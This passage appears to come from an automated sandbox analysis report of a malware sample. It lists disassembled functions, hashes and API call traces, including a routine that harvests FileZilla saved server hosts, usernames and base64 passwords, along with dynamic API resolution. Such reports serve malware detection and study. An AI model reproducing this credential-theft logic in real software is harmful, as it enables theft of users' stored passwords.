                                              • Instruction Fuzzy Hash: D9B1A372A083115BD308CF25C45136BF7E2EFC8710F1ACA3EE899D7291D779E9419A82
                                              Function 0487159F Relevance: .3, Instructions: 284COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                              • Instruction ID: dbb0da1120e295de86cf66677964907f7b5be8e9f44ea499d054b03ca52dc38b
                                              • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                              • Instruction Fuzzy Hash: D7B11771A197118FD706EE3DC491225F7E1AFD6280F50CB2EE895B7762EB31E8818740
                                              Function 048B134F Relevance: .3, Instructions: 274COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5185ef17974cb1e7938c1049dfbfd6043ba02edff510d25e23a45b9cf056c98f
                                              • Instruction ID: 601872aaf2cd96b99ae99b516af3fd7c64e78c5e5cac13fd5a1d0e6340e296cf
                                              • Opcode Fuzzy Hash: 5185ef17974cb1e7938c1049dfbfd6043ba02edff510d25e23a45b9cf056c98f
                                              • Instruction Fuzzy Hash: 2491D571F002158FDF14CF68C8A8BFA77A2AB56344F194A65D999EF382E261FC0187D1
                                              Function 048C8B64 Relevance: .3, Instructions: 269COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                              • Instruction ID: 5fcf684917cdb0f8e8139698455e518fa1932c1726cdc0f164267efc8416cbfb
                                              • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                              • Instruction Fuzzy Hash: E1B18D31650608DFD719DF28C48ABA57BE0FF45366F298A5CE999CF2A1C335E981CB40
                                              Function 0489A5FF Relevance: .3, Instructions: 268COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                              • Instruction ID: c54902496169c1d31f963678d47626a52a81f41e05787f6ed73c226709260e08
                                              • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                              • Instruction Fuzzy Hash: CAC14A75A04B1A8FC715DF28C08045AB3F2FF88350F258A6DE8999B721D731E996CF81
                                              Function 048ACA0F Relevance: .3, Instructions: 258COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                              • Instruction ID: 9fe3b9fceb38fbdc1767d41d08c8065244ceb3c6526269ec1977df8e87ad4b0d
                                              • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                              • Instruction Fuzzy Hash: A3917A319287905AFB168B3CCC417BABB94FFD6350F00CB1AF998B2491FBB1A5819345
                                              Function 048BC805 Relevance: .2, Instructions: 242COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                              • Instruction ID: ad524ed7ab76404d57f5ed2669e2e235062a2f0a5b82d047ac359191e4b3ceed
                                              • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                              • Instruction Fuzzy Hash: 9DA1E6B2A10A19DFEB19CF55CCC1A9EBBA1FB48314F14862ED45AEB390D374A544CF90
                                              Function 048836EF Relevance: .2, Instructions: 240COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                              • Instruction ID: 79cd2e955c5569dc42d818a22869f39a61b7881600f41f9be74de0da23147481
                                              • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                              • Instruction Fuzzy Hash: C6A16D72A083519BD308CF25C89075BF7E2EFC8710F1ACA3DE8999B654D774E9419B82
                                              Function 048B5C00 Relevance: .1, Instructions: 131COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                              • Instruction ID: 3262e84611de454d3ef6427cc991d646f79a4c3eacbb8f6a533a943d6c2925bb
                                              • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                              • Instruction Fuzzy Hash: 97515972E09BD989C7068B7944502EEBFB21FE6104F1E839EC4D85F382C2756289C3E5
                                              Function 02C236A3 Relevance: .1, Instructions: 61COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288500521.0000000002C23000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C23000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2c23000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                              • Instruction ID: 276ce4146e93015b8fd58be36e96b81ad1214dd7d4cf5fdc73cb6fc39a9f015a
                                              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                              • Instruction Fuzzy Hash: C211A1B2340110AFDB44DF55DCC1FA673EAFB89760B1980A5ED08CB312DA79E806CB60
                                              Function 04840D90 Relevance: .0, Instructions: 43COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                              • Instruction ID: 6fb2d71d34c6a1b7097446b24df2e8132588851feaede00a5a570a221b622c74
                                              • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                              • Instruction Fuzzy Hash: BE018476A006188FDB21CF24C804BAB33B5EBC6215F554AA5EA06D7241E774B9458B90
                                              Function 00419AA0 Relevance: .0, Instructions: 15COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                              Function 04859D07 Relevance: .0, Instructions: 15COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                              Function 048869EF Relevance: .0, Instructions: 15COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                              • Instruction ID: 4d4380f719737e920eca18c290049424b63e8615d1407fedd07d3ef3da97591e
                                              • Opcode Fuzzy Hash: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                              • Instruction Fuzzy Hash: E5D0C9716097114FC3688F1EB440946FAE8DBD8320715C53FA09AC3750C6B094418B54
                                              Function 0485D503 Relevance: 107.7, APIs: 86, Instructions: 188COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                              • Instruction ID: 4d80f86181818724da15ab596f0ea3b3d0b3b8f5b3ca866f257867a4524cc90b
                                              • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                              • Instruction Fuzzy Hash: F971F631410B009BE7727B35DD13E4977A17F22345F104F369AF6A0DF09AA278679752
                                              Function 004103B0 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363stringmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                                • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                                • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                                • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                                • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                                • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                                • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                              • strtok_s.MSVCRT ref: 0041047B
                                              • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBF,00420DBE,00420DBB,00420DBA), ref: 004104C2
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 004104C9
                                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 004104E5
                                              • lstrlenA.KERNEL32(00000000), ref: 004104F3
                                                • Part of subcall function 00418A70: malloc.MSVCRT ref: 00418A78
                                                • Part of subcall function 00418A70: strncpy.MSVCRT ref: 00418A93
                                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 0041052F
                                              • lstrlenA.KERNEL32(00000000), ref: 0041053D
                                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00410579
                                              • lstrlenA.KERNEL32(00000000), ref: 00410587
                                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 004105C3
                                              • lstrlenA.KERNEL32(00000000), ref: 004105D5
                                              • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 00410662
                                              • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041067A
                                              • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410692
                                              • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 004106AA
                                              • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 004106C2
                                              • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 004106D1
                                              • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 004106E0
                                              • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004106F3
                                              • lstrcatA.KERNEL32(?,00421770,?,?,00000000), ref: 00410702
                                              • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410715
                                              • lstrcatA.KERNEL32(?,00421774,?,?,00000000), ref: 00410724
                                              • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 00410733
                                              • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410746
                                              • lstrcatA.KERNEL32(?,00421780,?,?,00000000), ref: 00410755
                                              • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410764
                                              • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410777
                                              • lstrcatA.KERNEL32(?,00421790,?,?,00000000), ref: 00410786
                                              • lstrcatA.KERNEL32(?,00421794,?,?,00000000), ref: 00410795
                                              • strtok_s.MSVCRT ref: 004107D9
                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 004107EE
                                              • memset.MSVCRT ref: 0041083D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                              • API String ID: 337689325-555421843
                                              • Opcode ID: 4fc848dbf87095acd12c42b60f0aab464385706ec0422a8f446ef3a48111bdb9
                                              • Instruction ID: 8daa67574ba642934e37c5269d194fb48a2cec37eebf9d0dac7d381e96a5dd97
                                              • Opcode Fuzzy Hash: 4fc848dbf87095acd12c42b60f0aab464385706ec0422a8f446ef3a48111bdb9
                                              • Instruction Fuzzy Hash: 65D17271E01108ABCB04EBF0ED56EEE7339AF54315F50855AF102B7095EF38AA94CB69
                                              Function 04844877 Relevance: 51.1, APIs: 34, Instructions: 114stringmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrlen.KERNEL32(00424EC8), ref: 04844883
                                              • lstrlen.KERNEL32(00424F78), ref: 0484488E
                                              • lstrlen.KERNEL32(00425040), ref: 04844899
                                              • lstrlen.KERNEL32(004250F8), ref: 048448A4
                                              • lstrlen.KERNEL32(004251A0), ref: 048448AF
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 048448BE
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 048448C5
                                              • lstrlen.KERNEL32(00425248), ref: 048448D3
                                              • lstrlen.KERNEL32(004252F0), ref: 048448DE
                                              • lstrlen.KERNEL32(00425398), ref: 048448E9
                                              • lstrlen.KERNEL32(00425440), ref: 048448F4
                                              • lstrlen.KERNEL32(?), ref: 048448FF
                                              • lstrlen.KERNEL32(00425590), ref: 04844913
                                              • lstrlen.KERNEL32(00425638), ref: 0484491E
                                              • lstrlen.KERNEL32(004256E0), ref: 04844929
                                              • lstrlen.KERNEL32(00425788), ref: 04844934
                                              • lstrlen.KERNEL32(00425830), ref: 0484493F
                                              • lstrlen.KERNEL32(004258D8), ref: 04844968
                                              • lstrlen.KERNEL32(00425980), ref: 04844973
                                              • lstrlen.KERNEL32(00425A48), ref: 0484497E
                                              • lstrlen.KERNEL32(00425AF0), ref: 04844989
                                              • lstrlen.KERNEL32(00425B98), ref: 04844994
                                              • strlen.MSVCRT ref: 048449A7
                                              • lstrlen.KERNEL32(00425C40), ref: 048449CF
                                              • lstrlen.KERNEL32(00425CE8), ref: 048449DA
                                              • lstrlen.KERNEL32(00425D90), ref: 048449E5
                                              • lstrlen.KERNEL32(00425E38), ref: 048449F0
                                              • lstrlen.KERNEL32(00425EE0), ref: 048449FB
                                              • lstrlen.KERNEL32(00425F88), ref: 04844A0B
                                              • lstrlen.KERNEL32(00426030), ref: 04844A16
                                              • lstrlen.KERNEL32(004260D8), ref: 04844A21
                                              • lstrlen.KERNEL32(00426180), ref: 04844A2C
                                              • lstrlen.KERNEL32(00426228), ref: 04844A37
                                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 04844A53
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                              • String ID:
                                              • API String ID: 2127927946-0
                                              • Opcode ID: 17b32a439cbe3e0ae32343c02b1fa56e4c99a47b2d8951fd533b5c970d2f3f07
                                              • Instruction ID: 4a173e033aeaed09b1f249975f1aa841148fdae1188085e9c5ab489516118151
                                              • Opcode Fuzzy Hash: 17b32a439cbe3e0ae32343c02b1fa56e4c99a47b2d8951fd533b5c970d2f3f07
                                              • Instruction Fuzzy Hash: 28410C79740624ABE7109FE5FC4DBDCBF60AB4C712BA08051F90A89190C7F993859B7D
                                              Function 04859E17 Relevance: 49.7, APIs: 33, Instructions: 212libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcAddress.KERNEL32(006D72B8,006D6C04), ref: 04859E58
                                              • GetProcAddress.KERNEL32(006D72B8,006D6FC8), ref: 04859E71
                                              • GetProcAddress.KERNEL32(006D72B8,006D7044), ref: 04859E89
                                              • GetProcAddress.KERNEL32(006D72B8,006D6C64), ref: 04859EA1
                                              • GetProcAddress.KERNEL32(006D72B8,006D6C50), ref: 04859EBA
                                              • GetProcAddress.KERNEL32(006D72B8,006D6CF8), ref: 04859ED2
                                              • GetProcAddress.KERNEL32(006D72B8,006D6ED4), ref: 04859EEA
                                              • GetProcAddress.KERNEL32(006D72B8,006D6D3C), ref: 04859F03
                                              • GetProcAddress.KERNEL32(006D72B8,006D6FA0), ref: 04859F1B
                                              • GetProcAddress.KERNEL32(006D72B8,006D6F48), ref: 04859F33
                                              • GetProcAddress.KERNEL32(006D72B8,006D6DBC), ref: 04859F4C
                                              • GetProcAddress.KERNEL32(006D72B8,006D6CE8), ref: 04859F64
                                              • GetProcAddress.KERNEL32(006D72B8,006D700C), ref: 04859F7C
                                              • GetProcAddress.KERNEL32(006D72B8,006D6AB0), ref: 04859F95
                                              • GetProcAddress.KERNEL32(006D72B8,006D6F98), ref: 04859FAD
                                              • GetProcAddress.KERNEL32(006D72B8,006D6C24), ref: 04859FC5
                                              • GetProcAddress.KERNEL32(006D72B8,006D6E18), ref: 04859FDE
                                              • GetProcAddress.KERNEL32(006D72B8,006D7034), ref: 04859FF6
                                              • GetProcAddress.KERNEL32(006D72B8,006D6ABC), ref: 0485A00E
                                              • GetProcAddress.KERNEL32(006D72B8,006D6B2C), ref: 0485A027
                                              • GetProcAddress.KERNEL32(006D72B8,006D6CB0), ref: 0485A03F
                                              • LoadLibraryA.KERNEL32(006D6F50,?,04856F07), ref: 0485A051
                                              • LoadLibraryA.KERNEL32(006D6B7C,?,04856F07), ref: 0485A062
                                              • LoadLibraryA.KERNEL32(006D6B04,?,04856F07), ref: 0485A074
                                              • LoadLibraryA.KERNEL32(006D6BDC,?,04856F07), ref: 0485A086
                                              • LoadLibraryA.KERNEL32(006D6D28,?,04856F07), ref: 0485A097
                                              • GetProcAddress.KERNEL32(006D70DC,006D6EAC), ref: 0485A0B9
                                              • GetProcAddress.KERNEL32(006D71FC,006D6E24), ref: 0485A0DA
                                              • GetProcAddress.KERNEL32(006D71FC,006D6BCC), ref: 0485A0F2
                                              • GetProcAddress.KERNEL32(006D72EC,006D6D94), ref: 0485A114
                                              • GetProcAddress.KERNEL32(006D71B0,006D6B28), ref: 0485A135
                                              • GetProcAddress.KERNEL32(006D71E0,006D6E14), ref: 0485A156
                                              • GetProcAddress.KERNEL32(006D71E0,0042072C), ref: 0485A16D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc$LibraryLoad
                                              • String ID:
                                              • API String ID: 2238633743-0
                                              • Opcode ID: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
                                              • Instruction ID: 9e9e4c914507bcdfbd346379072f141aeff35a1d2eda5ec41df9613f162cd914
                                              • Opcode Fuzzy Hash: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
                                              • Instruction Fuzzy Hash: 15A16DB5D1A2549FC344DFA8FC889567BBBA78D301708A61BF909C3674E734A640CF62
                                              Function 04850617 Relevance: 48.4, APIs: 32, Instructions: 363stringmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 048591D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 04859202
                                                • Part of subcall function 0485AE97: lstrcpy.KERNEL32(00000000,?), ref: 0485AEE9
                                                • Part of subcall function 0485AE97: lstrcat.KERNEL32(00000000), ref: 0485AEF9
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AD17: lstrcpy.KERNEL32(?,00000000), ref: 0485AD5D
                                                • Part of subcall function 0484A377: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0484A3A3
                                                • Part of subcall function 0484A377: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0484A3C8
                                                • Part of subcall function 0484A377: LocalAlloc.KERNEL32(00000040,?), ref: 0484A3E8
                                                • Part of subcall function 0484A377: ReadFile.KERNEL32(000000FF,?,00000000,048416F6,00000000), ref: 0484A411
                                                • Part of subcall function 0484A377: LocalFree.KERNEL32(048416F6), ref: 0484A447
                                                • Part of subcall function 0484A377: CloseHandle.KERNEL32(000000FF), ref: 0484A451
                                                • Part of subcall function 04859227: LocalAlloc.KERNEL32(00000040,-00000001), ref: 04859249
                                              • strtok_s.MSVCRT ref: 048506E2
                                              • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBF,00420DBE,00420DBB,00420DBA), ref: 04850729
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 04850730
                                              • StrStrA.SHLWAPI(00000000,00421710), ref: 0485074C
                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 0485075A
                                                • Part of subcall function 04858CD7: malloc.MSVCRT ref: 04858CDF
                                                • Part of subcall function 04858CD7: strncpy.MSVCRT ref: 04858CFA
                                              • StrStrA.SHLWAPI(00000000,00421718), ref: 04850796
                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 048507A4
                                              • StrStrA.SHLWAPI(00000000,00421720), ref: 048507E0
                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 048507EE
                                              • StrStrA.SHLWAPI(00000000,00421728), ref: 0485082A
                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 0485083C
                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 048508C9
